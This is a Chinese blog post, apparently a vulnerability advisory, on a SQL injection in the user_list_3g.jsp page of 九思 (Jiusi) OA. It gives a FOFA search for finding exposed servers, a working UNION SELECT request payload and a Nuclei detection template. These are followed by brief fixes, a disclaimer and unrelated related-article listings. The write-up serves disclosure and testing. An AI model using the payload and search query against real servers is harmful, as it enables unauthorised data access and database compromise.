九思OA user-list-3g sql注入

最新推荐文章于 2024-06-14 10:30:09 发布
最新推荐文章于 2024-06-14 10:30:09 发布
阅读量419 收藏 10
点赞数 10
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/136070354
版权

【产品&&漏洞简述】

九思OA办公软件全面实现协同工作、公文、流程审批、知识管理、项目管理、综合办公、信息共享、移动办公 等应用功能,并能够与其他异构系统整合,打破信息孤岛,建立完整的有效的企业工作平台和移动办公软件。
九思OA user-list-3g sql注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

【资产测绘Query】

fofa语法:body="/jsoa/login.jsp"

【产品界面】

【漏洞复现】

【poc】
GET /jsoa/wap2/personalMessage/user_list_3g.jsp?org_id=0%20%20union/**/select/**/1,concat(11*111,user())%20%23&userIds=1&userNames=1&content=1 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Pixel 2 Build/OPM2.171019.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/3262 MMWEBSDK/201201 Mobile Safari/537.36 MMWEBID/7372 MicroMessenger/8.0.1840(0x28000036) Process/toolsmp WeChat/arm32 Weixin NetType/WIFI Language/zh_CN ABI/arm64

Accept-Encoding: gzip, deflate

Connection: close

【Nuclei-Poc验证】

id: msk-template

info:
name: msk-template
author: 11
severity: high



http:
- raw:
- |
GET /jsoa/wap2/personalMessage/user_list_3g.jsp?org_id=0%20%20union/**/select/**/1,concat(111*111,user())%20%23&userIds=1&userNames=1&content=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Pixel 2 Build/OPM2.171019.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/3262 MMWEBSDK/201201 Mobile Safari/537.36 MMWEBID/7372 MicroMessenger/8.0.1840(0x28000036) Process/toolsmp WeChat/arm32 Weixin NetType/WIFI Language/zh_CN ABI/arm64
Accept-Encoding: gzip, deflate
Connection: close


matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"12321")

【修复建议】

1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

zkzq
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
九思OA特点
05-31
九思OA特点: 中国高端OA第一品牌,中国OA系统项目成功率第一品牌,中国办公自动化系统领军企业,团队有10年以上OA软件阅历,是中国OA公司的先行者,
【漏洞复现】九思OA user_list_3g.jsp 存在SQL注入漏洞
KKleeeaa的博客
02-06 371
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。九思OA中的user_list_3g.jsp接口处存在SQL注入漏洞,攻击者可通过此漏洞进一步渗透,甚至获取管理员账户密码。用户输入的参数进行限制。增加WAF,设置白名单。0x02FOFA语句。
九思成代码生成器-免费版
06-29
九思成代码生成器不再是依据数据字段生成简单三层代码的那个东东,而是: 可使用表单设计器,拖拽就能迅速生成页面,可自动生成rdlc报表 可使用子表(二维表),能处理子表初始化、子表数据动态新增、删除 可使用...
OA九思集成ERPOA九思集成ERP.doc
06-20
OA九思集成ERPOA九思集成ERP
通达信指标公式源码通达信九思-金蛇狂舞副图指标 源码.doc
07-30
通达信指标公式源码通达信九思-金蛇狂舞副图指标 源码.doc 通达信九思-金蛇狂舞副图指标 源码是一个 technial 指标公式,它使用了多个指数移动平均线(EMA)来计算不同的移动平均值,然后使用这些移动平均值来生成...
九思协同办公系统管理员操作手册-LanzhouUniversity.pdf
10-12
"九思协同办公系统管理员操作手册-LanzouUniversity.pdf" 本 OPERATION 手册是为兰州大学协同办公系统OA管理员提供的操作手册,旨在帮助管理员熟悉系统管理和应用设置的操作步骤。 系统管理 系统管理员可以通过...
mysql-线上常用运维sql-2
jll126的博客
06-11 363
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
LLM之RAG实战(四十)| 使用LangChain SQL Agent和MySQL搭建多层RAG ChatBot
最新发布
wshzd的博客
06-14 607
在第二层,SQL Agent首先获取到用户的问题,然后要求 LLM 根据用户的问题创建 SQL 查询,使用内置函数在MySQL数据库上运行查询。在这里,我们使用的是 ChatPromptTemplate,如果你真的研究它,你会看到它是如何专门编写的,用于创建和运行 SQL 查询。在下一段代码中,将使用上一个代码块中定义的变量创建 QA 链,将消息添加到聊天记录中,然后运行链以获取改进的查询。这是代码的最后一部分,它将首先运行第一层以获取改进的查询,然后我们使用该改进的查询来获得最终响应。
PostgreSQL 快速入门与实战
代码洁癖症患者
06-11 911
# 创建模式## 删除模式## 删除模式并且删除该模式下的数据对象。
JavaSpringboot+vur前后端分离党员信息管理系统(源码+sql+论文)
u014445459的博客
06-11 778
简化系统开发和维护。它做的事情越多,就封装了常见的JavaScript功能和代码,并提供了一个简单的JavaScript设计相关的模式,用于优化HTML文档操作、事件处理、CSS样式化、动画设计和Ajax请求交互。在互联网技术高速发展的今天,通过互联网的传播会让企业更容易的创造更多的经济效益,利用互联网的传播党建信息管理、通过网页版党建信息管理平台的实现 ,让更多人了解到党建新闻、组织风采等相关信息、得到了更大的宣传,在这样一个大环境下把资源统筹规化起来,就会获得高效的党建党员信息和推广。
PostgreSQL的视图pg_roles
lee_vincent1的博客
06-10 646
pg_roles是 PostgreSQL 中的一个系统视图,提供了关于数据库角色(用户和组)的信息。PostgreSQL 中的角色用于管理数据库的权限、登录能力以及其他安全相关的特性。通过查询pg_roles视图,数据库管理员可以了解和管理数据库中所有角色的详细信息。pg_roles。
PostgreSQL的扩展(extensions)-常用的扩展-pg_stat_monitor
lee_vincent1的博客
06-13 965
是 PostgreSQL 的一个扩展,它提供了一种先进的监控和统计 SQL 查询的方式,相比于标准的,它提供了更丰富和详细的查询统计信息。通过捕获和分析 SQL 查询的执行情况,帮助数据库管理员优化数据库性能。
SQL主键回显
m0_63624484的博客
06-09 407
而我一个菜品应该会有多个口味,所以当我们在实现菜品插入功能的时候,我们还需要在插入完成菜品后,再把该菜品的口味也插入到对应的口味表中,而口味表中当然就需要所属菜品的id了。那么现在的问题就是,在菜品还没有插入之前,我是不知道菜品id的,因为菜品id是在菜品插入之后生成的id,所以我就需要在菜品插入完成后,再获得这个菜品生成的id赋值给口味对象,那么就需要使用到主键回显功能。当我们在一个业务功能下操作多张表时,当另一个表数据需要上一个表刚插入的数据的ID时,就需要使用到主键回显。
PostgreSQL Schema管理基础
weixin_43230594的博客
06-11 832
PostgreSQL Schema管理基础
SQL Server中的CTE和临时表优化
nbsaas-boot基于Request-Response的企业级快速开发框架
06-09 571
CTE和临时表在SQL Server中的应用各有优劣。CTE简化代码,提高可读性,适合较简单的查询和层次结构数据处理。而临时表则提供更高的灵活性和性能优化手段,适用于复杂的多步骤查询和大数据量处理。在实际应用中,我们需要根据具体需求选择最合适的技术手段,以达到最佳的性能和可维护性。
PostgreSQL的视图pg_tables
lee_vincent1的博客
06-10 520
是 PostgreSQL 中的一个系统视图,用于显示当前数据库中所有用户定义的表的信息。这个视图提供了关于表的名称、所属模式(schema)、所有者以及表类型等详细信息。以下是一些常用的查询示例,可以帮助你获取和分析表的信息。 查看特定模式下的所有表 查看表的基本信息 查看特定表的信息 查看是否有索引的表 查看启用了行级安全策略的表 示例脚本 查看所有用户表的信息 查看有触发器的表 可以结合 和 视图查看哪些表有触发器。例如: 使用案例 获取所有表的完整信息 分析索引和触发器情况 通过
SQLAlChemy】如何定义ORM模型,如何映射到数据库
weixin_55818116的博客
06-08 497
使用SQLAlChemy如何定义ORM模型,如何将其映射到数据库中,快来看看这篇文章吧。
【Nacos 2.3.3支持Postgre SQL数据源配置】
qq_35543206的博客
06-09 403
nacos配置postgresql数据库
PostgreSQL的视图pg_rules
lee_vincent1的博客
06-11 465
是 PostgreSQL 中的一个系统视图,用于显示数据库中存在的规则(rules)的相关信息。规则是一种允许在表的查询、插入、更新或删除操作上定义自定义行为的机制。通过查询 视图,数据库管理员和开发人员可以查看当前数据库中定义的所有规则信息。以下是一些常用的查询示例,可以帮助你获取和分析规则的信息。 查看特定模式下的所有规则 查看特定表的所有规则 查看特定规则的信息 显示所有规则及其所属的表和定义 获取所有规则的完整信息 查看特定表的所有规则定义 根据规则名称查找规则 通过 视图,数据库
oa项目java_九思软件:CIO选型OA办公系统实操方法
05-17
在选型OA办公系统之前,需要先明确自己的需求,以及公司的规模、业务流程等情况。接下来,可以按照以下实操方法进行选型: 1. 制定选型标准:根据公司的需求和规模,制定选型标准,包括功能需求、性能要求、安全要求、可扩展性等。 2. 筛选供应商:通过咨询、网络搜索等方式筛选合适的供应商,对比其产品的特点、价格、服务等因素,并选择几家供应商进行比较。 3. 考察供应商:对于选定的几家供应商,可以进行考察,包括实地考察、客户参考、产品演示等方式,以了解其实力、服务能力、产品质量等。 4. 评估和选择:根据考察结果和选型标准,对几家供应商进行评估和比较,最终选择最符合公司需求的供应商和产品。 5. 实施和推广:在选定供应商后,需要对其产品进行实施和推广,包括培训、数据迁移、配置调试等工作,确保其能够顺利地应用到公司的日常办公中。 需要注意的是,在选型过程中,除了考虑产品本身的特点和供应商的实力外,还需要考虑其后续的服务支持和维护能力,以确保其能够长期稳定地运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值